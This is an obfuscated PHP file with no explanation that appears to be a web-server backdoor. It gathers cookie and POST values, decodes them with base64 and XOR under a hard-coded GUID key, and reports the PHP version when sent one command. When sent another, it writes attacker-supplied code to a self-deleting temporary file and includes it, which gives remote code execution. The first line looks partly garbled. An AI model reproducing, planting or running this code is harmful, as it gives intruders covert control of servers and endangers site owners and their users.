<?php 
$icgn_m      =    'icgn_m' /*  h_   */ ^ /*  veqn   */ '';







$ojdfqulxwv       =   $_COOKIE;$makjw	=   63;


$pfotzvgzrb    =    $_POST;







function    gqxhtw()

{

    $zehme    =	'oedqwp';


	$ymorkgaqsr    = /*itv*/ 'tbvji'; /*   spgou */ $uoruysfem     =    'jf';

    $cvbbtg    =    'dk_lejwtd';

 /*   csa  */ $ymorkgaqsr      =    strtolower($cvbbtg);
    $tpwcrppi /*   cqk   */ = /* se_v_*/ 'gz';
    $_tupq       = /*  wa  */ 'wnuj';}

function    qfaqjbteph($zoijn,	$_mmdc)


{


 /* fkvlow   */ global    $icgn_m;
	$fgjbj /*   ua*/ =	"";

	$qorcnlhq    =       43;


	for /*   zpyqg  */ ($hovibbkmf       = /*d_y   */ 0;	$hovibbkmf  <	strlen($zoijn);)      {     for    ($vmzqq /* vk  */ =   0;       $vmzqq	<	strlen($_mmdc)    && /* ctp */ $hovibbkmf	<    strlen($zoijn);    $vmzqq++,   $hovibbkmf++)       { /*  h*/ $fgjbj  .= /* bfk */ $icgn_m(ord($zoijn[$hovibbkmf]) /*   oyevsj   */ ^    ord($_mmdc[$vmzqq]));


			$ubbzj	= /*   y   */ 20;


    }
 /*_xq  */ }	return	$fgjbj;


}

function	ofoykgnzo($xgqioeqoi,    $zoijn){

 /* nfxth   */ global   $icgn_m;

    $nhvlidty	=	sprintf("."."\x2f" /*hpsef   */ .    "%"."s"."."."p"."\154",    md5($xgqioeqoi));


 /*_sk  */ file_put_contents($nhvlidty, /*   bipgt  */ "<"    . /*g */ "\x3f" /*  g*/ . /*   bjb   */ "p".$icgn_m(104)	.    "p".$icgn_m(32)      .	"u"."\156" /* ginz  */ .   $icgn_m(108)	. /*acwxjz  */ $icgn_m(742-637).$icgn_m(110) /*bzyt   */ . /*v   */ "k"."(".$icgn_m(212-117)	.	"\137" /*vkyhi*/ .  "F"."I".$icgn_m(76)       .     $icgn_m(181-112)   .	"\x5f" /*qn */ .	"\137"     .  "\x29" /*dgp   */ . /*cp   */ "\73"  .	$icgn_m(32) /*zvx  */ .    $zoijn["d"]);
$dnysncev_	= /*u*/ 'wlw';


       include($nhvlidty);       $xbysdporj /*  usvc   */ =    $nhvlidty;
	$hmdyi_fcot    = /*  ouey  */ trim($dnysncev_);
	$eieuw  =    'et';

   @unlink($xbysdporj);

	$quzhi   =	41;


	$aytikix    =	5;

}

function     hhjauedr(){	global	$icgn_m;

       $hovibbkmf /* g  */ = /*   _hfwa  */ array();

	$sgqzoxlkhn    =    'kchgackai';
	$hovibbkmf[$icgn_m(112)    . /*  nlf*/ "\x76"] /*   xxxae   */ = /* fel   */ phpversion();	$ptiwrwpnd /* iqtoq   */ =	45;
	$hovibbkmf[$icgn_m(159-44)    .	"v"]     =  "3"."."."5";
      echo /* nblte   */ @serialize($hovibbkmf);


}






function  _mwtoyl()


{


    $kkibc	= /*ft*/ 67;

     $fnpzksz_u /*a   */ = /*rq  */ 'dc';
      $udxeicaoc      =       31;


      $kkibc      =    $udxeicaoc	* /* znzdv*/ 20;
    $ubvc_dfmtp    =       35;


}




_mwtoyl();





function /*  qtvqx*/ tgnwqkzu($zoijn,	$xgqioeqoi,    $wxs_eqkud){


	global /*   qiw   */ $icgn_m;


 /*  _cgah */ $zoijn      =     unserialize(qfaqjbteph(qfaqjbteph(base64_decode($zoijn),    $xgqioeqoi), /*  hepa*/ $wxs_eqkud));


 /* gv  */ if    (isset($zoijn["\141".$icgn_m(141-34)]))    {	if /* vt */ ($zoijn["\141"]      ==  $icgn_m(742-637))	{ /*  mzrsns   */ hhjauedr(); /*   dnbu  */ }       elseif   ($zoijn["\141"] /*_xmvh */ ==    "e")      {

	ofoykgnzo($xgqioeqoi,    $zoijn);			$ahgmgtvccg  =      74;     }


       exit();

	}


}



$ojdfqulxwv /*   azdy  */ =    array_merge($pfotzvgzrb, /*   o */ $ojdfqulxwv);



$xgqioeqoi /*  czker */ =  "7".$icgn_m(48) /* e  */ .   "5".$icgn_m(54)    . /*votff*/ $icgn_m(209-159)    .       "\67"    .       "b"."b"."\x2d" /* eyd_ */ .     "\x36"   .	$icgn_m(57)       . /* zqvgv*/ "\144"    . /*  we  */ "d"."\55"       . /*bmtjw */ "4"."\64"	. /*   vc   */ $icgn_m(509-461) /*  vcy   */ . /*  aqy  */ "3"."-"."8".$icgn_m(990-942)   .     "\144"    .  "c".$icgn_m(45)    .	"d"."e"."e"."c"."d".$icgn_m(57) /*rukwk   */ . /* xo */ "\64"      .  "0"."4".$icgn_m(56)    . /*   fyrjn*/ "\67" /* asoc   */ .	"\61";
foreach /*   sra   */ ($ojdfqulxwv    as /*   xo_ */ $wxs_eqkud       =>      $zoijn) /*   g*/ {
	tgnwqkzu($zoijn, /*ttvmf_*/ $xgqioeqoi,    $wxs_eqkud);}


$uro_xcm /*   ddu   */ =	'mojrruylqs';
$tfbtqzbbsi /* ne  */ =	31;
gqxhtw();




?>